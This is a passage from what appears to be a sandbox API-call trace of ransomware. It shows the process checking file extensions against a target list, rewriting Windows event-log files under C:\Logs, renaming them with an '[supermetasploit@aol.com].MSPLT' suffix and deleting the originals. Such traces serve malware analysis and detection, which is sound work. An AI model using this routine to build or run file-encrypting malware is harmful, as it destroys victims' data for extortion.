lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.314] ReadFile (in: hFile=0x420, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.314] WriteFile (in: hFile=0x3d0, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x138, lpOverlapped=0x0) returned 1 [0288.314] SetEndOfFile (hFile=0x3d0) returned 1 [0288.314] CloseHandle (hObject=0x3d0) returned 1 [0288.320] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.321] SetEndOfFile (hFile=0x420) returned 1 [0288.322] CloseHandle (hObject=0x420) returned 1 [0288.322] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.323] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 1 [0288.323] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.323] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.323] lstrlenW (lpString=".doc") returned 4 [0288.323] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.323] lstrlenW (lpString=".docx") returned 5 [0288.323] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.323] lstrlenW (lpString=".pdf") returned 4 [0288.323] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.323] lstrlenW (lpString=".xls") returned 4 [0288.324] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString=".xlsx") returned 5 [0288.324] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.324] lstrlenW (lpString=".ppt") returned 4 [0288.324] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.324] lstrlenW (lpString=".zip") returned 4 [0288.324] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString=".rar") returned 4 [0288.324] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString=".bz2") returned 4 [0288.324] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString=".7z") returned 3 [0288.324] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.324] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.324] lstrlenW (lpString=".dbf") returned 4 [0288.324] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.324] lstrlenW (lpString=".1cd") returned 4 [0288.324] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.324] lstrlenW (lpString=".jpg") returned 4 [0288.324] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.324] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.324] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.325] lstrlenW (lpString=".doc") returned 4 [0288.325] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString=".docx") returned 5 [0288.325] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.325] lstrlenW (lpString=".pdf") returned 4 [0288.325] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString=".xls") returned 4 [0288.325] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString=".xlsx") returned 5 [0288.325] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.325] lstrlenW (lpString=".ppt") returned 4 [0288.325] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.325] lstrlenW (lpString=".zip") returned 4 [0288.325] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString=".rar") returned 4 [0288.325] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString=".bz2") returned 4 [0288.325] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString=".7z") returned 3 [0288.325] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.325] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.325] lstrlenW (lpString=".dbf") returned 4 [0288.325] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.325] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.325] lstrlenW (lpString=".1cd") returned 4 [0288.325] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.326] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0288.326] lstrlenW (lpString=".jpg") returned 4 [0288.326] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.326] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.326] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 56 [0288.326] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0288.327] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=2166784) returned 1 [0288.327] CloseHandle (hObject=0x420) returned 1 [0288.327] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx")) returned 0x20 [0288.327] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.327] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0288.328] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0288.328] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fc64 | out: lpNewFilePointer=0x0) returned 1 [0288.328] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fc24 | out: lpNewFilePointer=0x0) returned 1 [0288.329] ReadFile (in: hFile=0x420, lpBuffer=0x41d7058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x371fc30, lpOverlapped=0x0 | out: lpBuffer=0x41d7058*, lpNumberOfBytesRead=0x371fc30*=0x40000, lpOverlapped=0x0) returned 1 [0288.501] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x371fc24 | out: lpNewFilePointer=0x0) returned 1 [0288.501] ReadFile (in: hFile=0x420, lpBuffer=0x4217058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x371fc30, lpOverlapped=0x0 | out: lpBuffer=0x4217058*, lpNumberOfBytesRead=0x371fc30*=0x40000, lpOverlapped=0x0) returned 1 [0288.511] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x371fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0288.511] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x371fc24 | out: lpNewFilePointer=0x0) returned 1 [0288.511] ReadFile (in: hFile=0x420, lpBuffer=0x4257058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x371fc30, lpOverlapped=0x0 | out: lpBuffer=0x4257058*, lpNumberOfBytesRead=0x371fc30*=0x40000, lpOverlapped=0x0) returned 1 [0288.855] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.855] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xc015c, lpNumberOfBytesWritten=0x371fca8, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fca8*=0xc015c, lpOverlapped=0x0) returned 1 [0288.881] SetEndOfFile (hFile=0x420) returned 1 [0288.882] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40000) returned 0x4087ee8 [0289.368] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fc74 | out: lpNewFilePointer=0x0) returned 1 [0289.368] WriteFile (in: hFile=0x420, lpBuffer=0x4087ee8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x371fc80, lpOverlapped=0x0 | out: lpBuffer=0x4087ee8*, lpNumberOfBytesWritten=0x371fc80*=0x40000, lpOverlapped=0x0) returned 1 [0289.370] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x371fc74 | out: lpNewFilePointer=0x0) returned 1 [0289.371] WriteFile (in: hFile=0x420, lpBuffer=0x4087ee8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x371fc80, lpOverlapped=0x0 | out: lpBuffer=0x4087ee8*, lpNumberOfBytesWritten=0x371fc80*=0x40000, lpOverlapped=0x0) returned 1 [0289.374] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x371fc74 | out: lpNewFilePointer=0x0) returned 1 [0289.374] WriteFile (in: hFile=0x420, lpBuffer=0x4087ee8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x371fc80, lpOverlapped=0x0 | out: lpBuffer=0x4087ee8*, lpNumberOfBytesWritten=0x371fc80*=0x40000, lpOverlapped=0x0) returned 1 [0289.376] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0289.380] CloseHandle (hObject=0x420) returned 1 [0290.931] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0290.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.965] lstrlenW (lpString=".doc") returned 4 [0290.965] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.965] lstrlenW (lpString=".docx") returned 5 [0290.965] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.965] lstrlenW (lpString=".pdf") returned 4 [0290.965] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.965] lstrlenW (lpString=".xls") returned 4 [0290.965] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.965] lstrlenW (lpString=".xlsx") returned 5 [0290.965] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.965] lstrlenW (lpString=".ppt") returned 4 [0290.965] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.965] lstrlenW (lpString=".zip") returned 4 [0290.965] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.966] lstrlenW (lpString=".rar") returned 4 [0290.966] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.966] lstrlenW (lpString=".bz2") returned 4 [0290.966] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.966] lstrlenW (lpString=".7z") returned 3 [0290.966] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.966] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.966] lstrlenW (lpString=".dbf") returned 4 [0290.966] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.966] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.966] lstrlenW (lpString=".1cd") returned 4 [0290.966] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.966] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.966] lstrlenW (lpString=".jpg") returned 4 [0290.966] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.966] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.966] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.966] lstrlenW (lpString=".doc") returned 4 [0290.966] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.966] lstrlenW (lpString=".docx") returned 5 [0290.966] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.966] lstrlenW (lpString=".pdf") returned 4 [0290.966] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString=".xls") returned 4 [0290.967] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString=".xlsx") returned 5 [0290.967] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.967] lstrlenW (lpString=".ppt") returned 4 [0290.967] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.967] lstrlenW (lpString=".zip") returned 4 [0290.967] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString=".rar") returned 4 [0290.967] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString=".bz2") returned 4 [0290.967] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString=".7z") returned 3 [0290.967] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.967] lstrlenW (lpString=".dbf") returned 4 [0290.967] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.967] lstrlenW (lpString=".1cd") returned 4 [0290.967] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0290.968] lstrlenW (lpString=".jpg") returned 4 [0290.968] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.968] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0290.968] lstrlenW (lpString="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 47 [0290.968] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.133] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0291.133] CloseHandle (hObject=0x43c) returned 1 [0291.133] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 0x20 [0291.134] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.134] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.134] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.134] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.134] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0291.340] GetLastError () returned 0x0 [0291.340] ReadFile (in: hFile=0x43c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.414] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.417] ReadFile (in: hFile=0x43c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.417] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x132, lpOverlapped=0x0) returned 1 [0291.417] SetEndOfFile (hFile=0x420) returned 1 [0291.418] CloseHandle (hObject=0x420) returned 1 [0291.423] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.423] SetEndOfFile (hFile=0x43c) returned 1 [0291.425] CloseHandle (hObject=0x43c) returned 1 [0291.425] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.425] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 1 [0291.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.426] lstrlenW (lpString=".doc") returned 4 [0291.426] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.426] lstrlenW (lpString=".docx") returned 5 [0291.426] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.426] lstrlenW (lpString=".pdf") returned 4 [0291.426] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.426] lstrlenW (lpString=".xls") returned 4 [0291.426] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.426] lstrlenW (lpString=".xlsx") returned 5 [0291.426] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.426] lstrlenW (lpString=".ppt") returned 4 [0291.426] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.426] lstrlenW (lpString=".zip") returned 4 [0291.426] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.426] lstrlenW (lpString=".rar") returned 4 [0291.427] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.427] lstrlenW (lpString=".bz2") returned 4 [0291.427] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.427] lstrlenW (lpString=".7z") returned 3 [0291.427] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.427] lstrlenW (lpString=".dbf") returned 4 [0291.427] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.427] lstrlenW (lpString=".1cd") returned 4 [0291.427] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.428] lstrlenW (lpString=".jpg") returned 4 [0291.428] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.428] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.428] lstrlenW (lpString=".doc") returned 4 [0291.428] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString=".docx") returned 5 [0291.428] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.428] lstrlenW (lpString=".pdf") returned 4 [0291.428] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString=".xls") returned 4 [0291.428] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString=".xlsx") returned 5 [0291.428] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.428] lstrlenW (lpString=".ppt") returned 4 [0291.428] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.428] lstrlenW (lpString=".zip") returned 4 [0291.428] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString=".rar") returned 4 [0291.428] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString=".bz2") returned 4 [0291.428] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.428] lstrlenW (lpString=".7z") returned 3 [0291.428] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.429] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.429] lstrlenW (lpString=".dbf") returned 4 [0291.429] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.429] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.429] lstrlenW (lpString=".1cd") returned 4 [0291.429] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.429] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0291.429] lstrlenW (lpString=".jpg") returned 4 [0291.429] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.429] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.429] lstrlenW (lpString="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 56 [0291.429] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.430] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0291.430] CloseHandle (hObject=0x43c) returned 1 [0291.431] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 0x20 [0291.431] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.431] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.431] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.431] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.431] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0291.432] GetLastError () returned 0x0 [0291.432] ReadFile (in: hFile=0x43c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, 